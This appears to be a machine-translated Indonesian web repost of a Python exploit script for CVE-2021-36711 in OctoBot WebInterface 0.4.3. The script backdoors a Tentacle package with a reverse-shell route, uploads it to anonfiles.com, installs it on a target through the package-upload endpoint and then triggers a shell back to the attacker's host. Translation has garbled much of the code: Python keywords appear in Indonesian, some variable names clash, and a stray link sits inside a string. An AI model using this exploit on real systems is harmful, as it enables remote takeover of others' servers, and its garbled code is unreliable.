OctoBot WebInterface 0.4.3 Eksekusi Kode Jarak Jauh

  • Whatsapp
RiteCMS 3.1.0 Penghapusan File Sewenang-wenang
RiteCMS Penghapusan File Sewenang wenang

News.nextcloud.asia

# Judul Eksploitasi: OctoBot WebInterface 0.4.3 – Eksekusi Kode Jarak Jauh (RCE)
# Tanggal: 9/2/2021
# Eksploitasi Penulis: Samy Younsi
# Beranda Vendor: https://www.octobot.online/
# Tautan Perangkat Lunak: https://github.com/Drakkar-Software/OctoBot
# Versi: 0.4.0beta3 – 0.4.3
# Diuji pada: Linux (Ubuntu, CentOs)
#CVE : CVE-2021-36711

dari __future__ impor print_function, unicode_literals
dari bs4 impor BeautifulSoup
impor argparse
permintaan impor
impor file zip
waktu impor
sistem impor
impor kami

spanduk def():
sashimiLogo = “””
_________ . .
(.. \_ , |\ /|
\ O \ /| \ \/ /
\______ \/ | \ /
dllvv\ \ | / |
_ _ _ _ \^^^^ == \_/ |
| | __ _ | || |__ (_)_ __ ___ (_)`\_ === \. |
/ __)/ _` / __| ‘_ \| | ‘_ ` _ \\| |/ /\_ \ / |
\__ | (_| \__ | | | | | | | | | ||/ \_ \| /
( /\__,_( |_| |_|_|_| |_| |_|_| \______/
|_| |_| \033[1;91mOctoBot Killer\033[1;m
Author: \033[1;92mNaqwada\033[1;m
RuptureFarm 1029

FOR EDUCATIONAL PURPOSE ONLY.
“””
return print(‘\033[1;94m{}\033[1;m’.format(sashimiLogo))

def help():
print(‘[!] \033[1;93mUsage: \033[1;m’)
print(‘[-] python3 {} –RHOST \033[1;92mTARGET_IP\033[1;m –RPORT \033[1;92mTARGET_PORT\033[1;m –LHOST \033[1;92mYOUR_IP\033[1;m –LPORT \033[1;92mYOUR_PORT\033[1;m’.format(sys.argv[0]))
mencetak(‘[-] \033[1;93mNote*\033[1;m If you are using a hostname instead of an IP address please remove http:// or https:// and try again.’)

def getOctobotVersion(RHOST, RPORT):
if RPORT == 443:
url=”https://{}:{}/api/version”.format(RHOST, RPORT)
else:
url=”http://{}:{}/api/version”.format(RHOST, RPORT)
return curl(url)

def restartOctobot(RHOST, RPORT):
if RPORT == 443:
url=”https://{}:{}/commands/restart”.format(RHOST, RPORT)
else:
url=”http://{}:{}/commands/restart”.format(RHOST, RPORT)

try:
requests.get(url, allow_redirects=False, verify=False, timeout=1)
except requests.exceptions.ConnectionError as e:
print(‘[+] \033[1;92mOctoBot is restarting … Please wait 30 seconds.\033[1;m’)
time.sleep(30)

def downloadTentaclePackage(octobotVersion):
print(‘[+] \033[1;92mStart downloading Tentacle package for OctoBot {}.\033[1;m’.format(octobotVersion))
url=”https://static.octobot.online/tentacles/officials/packages/full/base/{}/any_platform.zip”.format(octobotVersion)
result = requests.get(url, stream=True)
with open(‘{}.zip’.format(octobotVersion), ‘wb’) as fd:
for chunk in result.iter_content(chunk_size=128):
fd.write(chunk)
print(‘[+] \033[1;92mDownload completed!\033[1;m’)

def unzipTentaclePackage(octobotVersion):
zip = zipfile.ZipFile(‘{}.zip’.format(octobotVersion))
zip.extractall(‘quests’)
os.remove(‘{}.zip’.format(octobotVersion))
print(‘[+] \033[1;92mTentacle package has been extracted.\033[1;m’)

def craftBackdoor(octobotVersion):
print(‘[+] \033[1;92mCrafting backdoor for Octobot Tentacle Package {}…\033[1;m’.format(octobotVersion))
path=”quests/reference_tentacles/Services/Interfaces/web_interface/api/”
injectInitFile(path)
injectMetadataFile(path)
print(‘[+] \033[1;92mSashimi malicious Tentacle Package for OctoBot {} created!\033[1;m’.format(octobotVersion))

def injectMetadataFile(path):
with open(‘{}metadata.py’.format(path),’r’) as metadataFile:
content = metadataFile.read()
addPayload = content.replace(‘import json’, ”.join(‘import json\nimport flask\nimport sys, socket, os, pty’))
addPayload = addPayload.replace(‘@api.api.route(“/announcements”)’, ”.join(‘@api.api.route(“/sashimi”)\ndef sashimi():\n\ts = socket.socket()\n\ts.connect((flask.request.args.get(“LHOST”), int(flask.request.args.get(“LPORT”))))\n\t[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]\n\tpty.spawn(“/bin/sh”)\n\n\[email protected](“/pengumuman”)’))
dengan open(‘{}metadata.py’.format(path),’w’) sebagai newMetadataFile:
newMetadataFile.write(addPayload)

def injectInitFile (jalur):
dengan open(‘{}__init__.py’.format(path),’r’) sebagai initFile:
konten = initFile.read()
addPayload = content.replace(‘pengumuman,’, ”.join(‘pengumuman,\n\tsashimi,’))
addPayload = addPayload.replace(‘”pengumuman”,’, ”.join(‘”pengumuman”,\n\t”sashimi”,’))
dengan open(‘{}__init__.py’.format(path),’w’) sebagai newInitFile:
newInitFile.write(addPayload)

def rePackTentaclePackage():
mencetak(‘[+] \033[1;92mRepacking Tentacle package.\033[1;m’)
with zipfile.ZipFile(‘any_platform.zip’, mode=”w”) as zipf:
len_dir_path = len(‘quests’)
for root, _, files in os.walk(‘quests’):
for file in files:
file_path = os.path.join(root, file)
zipf.write(file_path, file_path[len_dir_path:])

def uploadMaliciousTentacle():
mencetak(‘[+] \033[1;92mUploading Sashimi malicious Tentacle .ZIP package on anonfiles.com” link=”https://app.recordedfuture.com/live/sc/entity/idn:anonfiles.com” style=””>anonfiles.com… May take a minute.\033[1;m’)

file = {
‘file’: open(‘any_platform.zip’, ‘rb’),
}
response = requests.post(‘https://api.anonfiles.com/upload’, files=file, timeout=60)
zipLink = response.json()[‘data’][‘file’][‘url’][‘full’]
respon = request.get(zipLink, timeout=60)
sup = BeautifulSoup(response.content.decode(‘utf-8’), ‘html.parser’)
zipLink = soup.find(id=’download-url’).get(‘href’)
mencetak(‘[+] \033[1;92mSashimi malicious Tentacle has been successfully uploaded. {}\033[1;m’.format(zipLink))
return zipLink

def curl(url):
response = requests.get(url, allow_redirects=False, verify=False, timeout=60)
return response

def injectBackdoor(RHOST, RPORT, zipLink):
print(‘[+] \033[1;92mInjecting Sashimi malicious Tentacle packages in Ocotobot… May take a minute.\033[1;m’)
if RPORT == 443:
url=”https://{}:{}/advanced/tentacle_packages?update_type=add_package”.format(RHOST, RPORT)
else:
url=”http://{}:{}/advanced/tentacle_packages?update_type=add_package”.format(RHOST, RPORT)

headers = {
‘Content-Type’: ‘application/json’,
‘X-Requested-With’: ‘XMLHttpRequest’,
}

data=”{“”+zipLink+'”:”register_and_install”}’

response = requests.post(url, headers=headers, data=data)
response = response.content.decode(‘utf-8’).replace(‘”‘, ”).strip()

os.remove(‘any_platform.zip’)

if response != ‘Tentacles installed’:
print(‘[!] \033[1;91mError: Something went wrong while trying to install the malicious Tentacle package.\033[1;m’)
exit()
print(‘[+] \033[1;92mSashimi malicious Tentacle package has been successfully installed on the OctoBot target.\033[1;m’)

def execReverseShell(RHOST, RPORT, LHOST, LPORT):
print(‘[+] \033[1;92mExecuting reverse shell on {}:{}.\033[1;m’.format(LHOST, LPORT))
if RPORT == 443:
url=”https://{}:{}/api/sashimi?LHOST={}&LPORT={}”.format(RHOST, RPORT, LHOST, LPORT)
else:
url=”http://{}:{}/api/sashimi?LHOST={}&LPORT={}”.format(RHOST, RPORT, LHOST, LPORT)
return curl(url)

def isPassword(RHOST, RPORT):
if RPORT == 443:
url=”https://{}:{}”.format(RHOST, RPORT)
else:
url=”http://{}:{}”.format(RHOST, RPORT)
return curl(url)

def main():
banner()
args = parser.parse_args()

if isPassword(args.RHOST, args.RPORT).status_code != 200:
print(‘[!] \033[1;91mError: This Octobot Platform seems to be protected with a password!\033[1;m’)

octobotVersion = getOctobotVersion(args.RHOST, args.RPORT).content.decode(‘utf-8’).replace(‘”‘,”).replace(‘OctoBot ‘,”)

if len(octobotVersion) > 0:
print(‘[+] \033[1;92mPlatform OctoBot {} detected.\033[1;m’.format(octobotVersion))

downloadTentaclePackage(octobotVersion)
unzipTentaclePackage(octobotVersion)
craftBackdoor(octobotVersion)
rePackTentaclePackage()
zipLink = uploadMaliciousTentacle()
injectBackdoor(args.RHOST, args.RPORT, zipLink)
restartOctobot(args.RHOST, args.RPORT)
execReverseShell(args.RHOST, args.RPORT, args.LHOST, args.LPORT)

if __name__ == “__main__”:
parser = argparse.ArgumentParser(description=’POC script that exploits the Tentacles upload functionalities on OctoBot. A vulnerability has been found and can execute a reverse shell by crafting a malicious packet. Version affected from 0.4.0b3 to 0.4.0b10 so far.’, add_help=False)
parser.add_argument(‘-h’, ‘–help’, help=help())
parser.add_argument(‘–RHOST’, help=”Refers to the IP of the target machine.”, type=str, required=True)
parser.add_argument(‘–RPORT’, help=”Refers to the open port of the target machine.”, type=int, required=True)
parser.add_argument(‘–LHOST’, help=”Refers to the IP of your machine.”, type=str, required=True)
parser.add_argument(‘–LPORT’, help=”Refers to the open port of your machine.”, type=int, required=True)
main()

Pos terkait

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan.